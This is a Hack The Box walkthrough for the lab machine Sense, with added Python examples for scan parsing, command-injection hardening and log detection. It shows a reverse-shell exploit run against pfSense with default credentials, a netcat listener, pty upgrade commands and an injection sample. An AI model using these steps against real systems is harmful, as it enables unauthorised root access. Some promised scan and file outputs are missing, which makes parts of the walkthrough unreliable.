Keep Calm and Hack The Box – An In-Depth Guide to Pwning Sense
Hack The Box (HTB) provides an excellent platform for aspiring penetration testers and cybersecurity enthusiasts to legally test and expand their ethical hacking skills. The online labs offer a wide variety of challenges that simulate real-world scenarios and vulnerabilities across different operating systems and difficulty levels.
In this walkthrough, we'll dive deep into exploiting Sense, a retired HTB machine that showcases the dangers of using default credentials and outdated software versions. We'll follow a standard penetration testing methodology and leverage open source tools like Nmap, Gobuster, and Searchsploit to compromise the system and obtain root privileges.
So fire up your Kali Linux VM and let's get started!
Step 1 – Reconnaissance
As with any penetration test, we begin by gathering as much information as possible about our target. A thorough recon phase is critical as it helps uncover potential attack vectors and lays the groundwork for the rest of the engagement.
Port Scanning with Nmap
Our first step is to perform an Nmap scan to identify open ports and running services on the Sense machine. Nmap is a powerful and versatile network mapping tool included in Kali Linux by default.
We'll run an aggressive SYN scan with OS fingerprinting, service version detection, and default NSE scripts using the following command:
nmap -A -sV -sC -p- 10.10.10.60 -oN sense_scan.txt
Here's a breakdown of the flags used:
- -A: Enables OS and version detection, script scanning and traceroute (it already implies -sV and -sC, so listing them again is harmless)
- -sV: Performs service version detection
- -sC: Runs default NSE scripts
- -p-: Scans all 65,535 ports
- -oN: Saves output in normal format to sense_scan.txt
After a few minutes, Nmap should complete its scan. Let's analyze the results:
The scan reveals two open TCP ports:
- Port 80 (HTTP)
- Port 443 (HTTPS)
Both ports are commonly associated with web servers, so let's continue our enumeration efforts there.
Directory Enumeration with Gobuster
Next, we'll use Gobuster to brute force directories and files on the web server. Gobuster is a fast, multi-threaded tool that uses wordlists to discover hidden paths.
We'll scan the web server using the common.txt wordlist from the SecLists package with the following command:
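As an added example (not part of the original walkthrough), here is a small Python helper that reads the -oN file the scan above writes and turns the port table into records, so the open-port list can be compared against what the host is supposed to expose instead of being read by eye. The SAMPLE_SCAN text is a constructed stand-in for sense_scan.txt: its banners and timing values are made up, not copied from the page.

```python
"""Parse Nmap "normal" output (-oN) into port records.

Added example for this walkthrough, not code from the original post. SAMPLE_SCAN
is a constructed stand-in for sense_scan.txt; the service banners and timing
values in it are illustrative, not values observed on the Sense box.
"""
from __future__ import annotations

import re

SAMPLE_SCAN = """\
# Nmap 7.70 scan initiated (constructed sample) as: nmap -A -sV -sC -p- 10.10.10.60 -oN sense_scan.txt
Nmap scan report for 10.10.10.60
Host is up (0.044s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     example-httpd 1.0 (constructed banner)
443/tcp open   ssl/http example-httpd 1.0 (constructed banner)
# Nmap done (constructed sample) -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# A port-table row: "<port>/<proto>  <state>  <service>  [<version text>]".
# Header rows, host lines and the "Not shown" summary never start with "<digits>/".
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


def parse_nmap_normal(text: str) -> list[dict]:
    """Return one record per port-table row, in file order."""
    records = []
    for raw in text.splitlines():
        match = PORT_LINE.match(raw.strip())
        if not match:
            continue
        rec = match.groupdict()
        rec["port"] = int(rec["port"])
        rec["version"] = (rec["version"] or "").strip()
        records.append(rec)
    return records


def open_ports(text: str) -> list[int]:
    """Port numbers Nmap reported as open."""
    return [r["port"] for r in parse_nmap_normal(text) if r["state"] == "open"]


def unexpected_exposure(text: str, allowed: set[int]) -> list[dict]:
    """Open ports missing from the allowed set: the defender's reading of the same
    scan (for Sense, the web UI should not have been reachable on either port from
    an untrusted network, so an empty allow-list flags both)."""
    return [r for r in parse_nmap_normal(text)
            if r["state"] == "open" and r["port"] not in allowed]


if __name__ == "__main__":
    for rec in parse_nmap_normal(SAMPLE_SCAN):
        print(f"{rec['port']}/{rec['proto']:<3} {rec['state']:<7} {rec['service']:<9} {rec['version']}")
    print("open:", open_ports(SAMPLE_SCAN))
    print("unexpected (nothing allowed):",
          [r["port"] for r in unexpected_exposure(SAMPLE_SCAN, set())])
```

Point the script at the real sense_scan.txt (read the file instead of SAMPLE_SCAN) and the same functions work unchanged, since -oN always prints the port table in this shape.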
gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -k
The -k flag skips SSL certificate verification, which is useful for self-signed or expired certs.
Gobuster identifies several interesting directories:
The /changelog.txt and /system-users.txt files look particularly promising. Let's investigate further.
Step 2 – Identifying Vulnerabilities
Navigating to https://10.10.10.60/changelog.txt in a browser reveals some juicy information:
The changelog mentions the pfSense firewall version 2.1.3 and alludes to some older vulnerabilities that were patched. However, version 2.1.3 is still quite outdated and likely has known exploits.
The /system-users.txt file is also intriguing:
It contains the username Rohit and a hint that the "password is the default pfSense password".
Armed with the pfSense version and a potential username, let's perform a quick Google search to find the default password.
The very first result reveals that the default username is indeed admin and the default password for pfSense is pfsense.
We have enough information now to search for applicable exploits and plan our initial foothold.
Step 3 – Searching for Exploits
To find existing exploits for pfSense 2.1.3, we'll consult Exploit-DB using the Searchsploit tool.
searchsploit pfsense 2.1.3
There are quite a few results, but the "pfSense < 2.1.4 – 'status_rrd_graph_img.php' Command Injection" exploit immediately stands out. According to the description, it allows remote code execution as root!
Let's examine the exploit details:
searchsploit -x 43560
The exploit appears to be written in Python and requires the following arguments:
- RHOST: Remote host to connect to
- LHOST: Local host to connect back to
- LPORT: Local port to connect back to
- Username and password for pfSense authentication
We have all the information needed to attempt exploitation.
Step 4 – Gaining Initial Access
Let's copy the Python exploit to our working directory:
searchsploit -m 43560
Reviewing the exploit code, we see it performs the following high-level steps:
- Authenticate to the pfSense web interface using the provided credentials
- Inject a PHP command injection payload into a vulnerable GET parameter
- Execute a Python reverse shell back to our attack machine
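The second bullet is the whole vulnerability class behind this exploit, so here is the pattern in Python as an added illustration (not pfSense's code and not the exploit's): a constructed request handler that splices a GET parameter into a shell command, next to the hardened form that validates against an allow-list and passes arguments as a list. The database names, the RRD_DIR path and the function names are all made up for the example; the functions build commands but never run them.

```python
"""Command-injection pattern behind the Sense exploit, shown in Python.

Added example, not pfSense code: the handler below is a constructed stand-in
for a web endpoint that splices a GET parameter into a shell command.
build_graph_command_unsafe reproduces the flaw (string concatenation that a
shell later parses); build_graph_command_safe is the hardened form (strict
allow-list, then an argv list that no shell interprets). Neither function
executes anything, so the difference can be inspected offline.
"""
from __future__ import annotations

import re

# Constructed allow-list of RRD files this endpoint may graph.
ALLOWED_DATABASES = {"wan-traffic.rrd", "lan-traffic.rrd", "system-processor.rrd"}
RRD_DIR = "/var/db/rrd"  # assumed path, placeholder for the example

# Characters a shell uses to end the intended command and start another.
SHELL_METACHARS = re.compile(r"[;&|`$<>\n]")


class InvalidParameter(ValueError):
    """Raised when the request parameter is not on the allow-list."""


def build_graph_command_unsafe(database: str) -> str:
    """Vulnerable: the untrusted value becomes part of a shell command string."""
    return f"rrdtool graph /tmp/graph.png DEF:a={RRD_DIR}/{database}:value:AVERAGE"


def build_graph_command_safe(database: str) -> list[str]:
    """Hardened: reject anything not on the allow-list, then build argv (no shell)."""
    if database not in ALLOWED_DATABASES:
        raise InvalidParameter(f"unknown database {database!r}")
    return ["rrdtool", "graph", "/tmp/graph.png",
            f"DEF:a={RRD_DIR}/{database}:value:AVERAGE"]


def shell_would_inject(command: str) -> bool:
    """True if the shell string contains a metacharacter that breaks out of the
    intended rrdtool invocation. Used here to show the problem, not as the fix:
    blacklisting characters is weaker than the allow-list above."""
    return SHELL_METACHARS.search(command) is not None


def handle_request(query: dict[str, str]) -> list[str]:
    """Mimics the hardened endpoint: takes the parsed GET query, returns argv.
    A missing parameter is treated exactly like an invalid one."""
    return build_graph_command_safe(query.get("database", ""))


if __name__ == "__main__":
    for value in ("wan-traffic.rrd", "wan-traffic.rrd;id"):
        unsafe = build_graph_command_unsafe(value)
        print(f"unsafe: {unsafe!r}  injects={shell_would_inject(unsafe)}")
        try:
            print(f"safe:   {handle_request({'database': value})}")
        except InvalidParameter as exc:
            print(f"safe:   rejected ({exc})")
```

The vulnerable variant is only dangerous once something like subprocess.run(unsafe, shell=True) executes the string; the hardened variant never hands a string to a shell at all, so even a value that slipped past the allow-list could only ever be one argv element.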
Before running the exploit, let's set up a netcat listener to catch the incoming shell:
nc -nvlp 443
We'll use port 443 so the reverse-shell traffic blends in with ordinary HTTPS connections.
Now let's trigger the exploit and obtain remote code execution on Sense!
python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.28 --lport 443 --username rohit --password pfsense
Success! We received a callback on our netcat listener and now have a shell on Sense. We can upgrade to a full TTY shell using Python as follows:
python -c 'import pty;pty.spawn("/bin/bash")'
Step 5 – Privilege Escalation to root
We'll perform some manual post-exploitation enumeration to search for quick privilege escalation vectors.
Current user and permissions:
whoami && id
Our current shell is running as the root user! No privilege escalation is necessary. We can simply read the user and root flags from their usual locations:
cat /home/rohit/user.txt
cat /root/root.txt
Congratulations, we now have complete control over the Sense machine!
Lessons Learned and Remediations
The Sense box teaches us several valuable lessons about common security misconfigurations and vulnerabilities:
- Default credentials – Many systems and applications come with default usernames and passwords to aid in initial setup. However, it is critical that these default credentials are changed before deploying to production. Leaving default passwords is akin to locking your front door but placing the key under the doormat.
- Outdated and unpatched software – pfSense version 2.1.3 was released in 2015 and contains multiple vulnerabilities that have since been patched in later versions. Organizations must have an effective patch management program to identify and remediate known vulnerabilities in a timely manner. Tools like Nessus can help automate much of this process.
- Overly permissive firewall rules – pfSense is a firewall, yet access to the web interface was allowed from any IP address. Network filtering should be configured based on the principle of least privilege – only allow the bare minimum required access. At the very least, the web interface should have been restricted to internal IP ranges only.
- Lack of network segmentation – There was no separation between the web interface and the internal pfSense management network. Sensitive management interfaces should always be placed in isolated network segments and VLANs separate from user workstations and untrusted networks. Jumpboxes and strong authentication should be required for administrative access.
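Each of those lessons also has a detection side. As an added example (not part of the original walkthrough), the Python below runs three rules over constructed web-server access-log lines: reads of the files that leaked the username and version, calls to the vulnerable script carrying shell metacharacters in the query string, and any web UI request from outside a management network. The log lines, the addresses and the 192.168.1.0/24 management range are all made up for the demo, and the rules target the generic combined log format rather than pfSense's own logging.

```python
"""Detection rules for the Sense attack chain over web-server access logs.

Added example, not part of the original walkthrough. Everything here is
constructed for the demo: the log lines, the addresses (TEST-NET and RFC 1918
ranges) and the management network. The rules are written against the generic
"combined" access-log format, not against pfSense's own logging.
"""
from __future__ import annotations

import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Assumed: the only network that should ever reach the firewall's web UI.
MANAGEMENT_NET = ipaddress.ip_network("192.168.1.0/24")

# Files that leaked a username and the software version during the walkthrough.
LEAKED_FILES = {"/changelog.txt", "/system-users.txt"}
# Script named in the Exploit-DB entry used above.
VULNERABLE_SCRIPT = "/status_rrd_graph_img.php"
# Characters a shell uses to end one command and start another.
SHELL_METACHARS = re.compile(r"[;&|`$<>\n]")

# Apache/nginx "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: an administrator on the management LAN, then an outside
# host following the same path the walkthrough takes (directory brute force,
# login, injection attempt with the ';' URL-encoded as %3B).
SAMPLE_LOG = """\
192.168.1.10 - - [21/Oct/2017:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Oct/2017:10:02:10 +0000] "GET /changelog.txt HTTP/1.1" 200 312 "-" "gobuster/2.0"
203.0.113.7 - - [21/Oct/2017:10:02:11 +0000] "GET /system-users.txt HTTP/1.1" 200 96 "-" "gobuster/2.0"
203.0.113.7 - - [21/Oct/2017:10:05:42 +0000] "POST /index.php HTTP/1.1" 302 0 "-" "python-requests/2.18"
203.0.113.7 - - [21/Oct/2017:10:05:43 +0000] "GET /status_rrd_graph_img.php?database=queues%3Bid HTTP/1.1" 200 0 "-" "python-requests/2.18"
192.168.1.10 - - [21/Oct/2017:10:07:00 +0000] "GET /status_rrd_graph_img.php?database=wan-traffic.rrd HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def parse_log(text: str) -> list[dict]:
    """Parse combined-format lines; lines that do not match are skipped, not raised."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        parts = urlsplit(ev["target"])
        ev["path"] = parts.path
        ev["query"] = unquote(parts.query)  # decode once so %3B is inspected as ';'
        events.append(ev)
    return events


def leaked_file_access(events: list[dict]) -> list[dict]:
    """Rule 1: anyone reading the files that leaked the username and version."""
    return [e for e in events if e["path"] in LEAKED_FILES]


def command_injection(events: list[dict]) -> list[dict]:
    """Rule 2: the vulnerable script called with shell metacharacters in the query."""
    return [e for e in events
            if e["path"] == VULNERABLE_SCRIPT and SHELL_METACHARS.search(e["query"])]


def admin_from_untrusted(events: list[dict]) -> list[dict]:
    """Rule 3: any web-UI request from outside the management network."""
    return [e for e in events if ipaddress.ip_address(e["ip"]) not in MANAGEMENT_NET]


def run_rules(text: str) -> dict[str, list[str]]:
    """Run all rules and report 'ip path' per hit, keyed by rule name."""
    events = parse_log(text)
    rules = {"leaked_file_access": leaked_file_access,
             "command_injection": command_injection,
             "admin_from_untrusted": admin_from_untrusted}
    return {name: [f"{e['ip']} {e['path']}" for e in rule(events)]
            for name, rule in rules.items()}


if __name__ == "__main__":
    for name, hits in run_rules(SAMPLE_LOG).items():
        print(f"{name}: {len(hits)} hit(s)")
        for hit in hits:
            print("   ", hit)
```

Rule 3 is the one that would have fired first and loudest here: every request from 203.0.113.7 is a hit, before any exploit code is involved, which is exactly why restricting the management interface to internal ranges matters more than any signature. Rule 2 decodes the query string before matching so a URL-encoded separator is not missed; on a real deployment the same idea extends to any parameter a handler passes to a shell.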
I hope you enjoyed this deep dive into attacking and exploiting the Sense machine on Hack The Box. The key takeaways are to always change default passwords, keep systems patched and up-to-date, enforce the principle of least privilege, and implement network segmentation between untrusted and trusted zones.
As aspiring ethical hackers and penetration testers, we must strive to think like real-world adversaries and be thorough in our approach. There is no better way to build these critical skills than by continuously learning and practicing on new targets.
Stay curious, keep calm, and hack all the boxes!
Additional Resources
– Hack The Box: https://www.hackthebox.eu/
– pfSense Documentation: https://docs.netgate.com/pfsense/en/latest/
– OWASP Top 10: https://owasp.org/www-project-top-ten/
– Offensive Security Certified Professional (OSCP): https://www.offensive-security.com/pwk-oscp/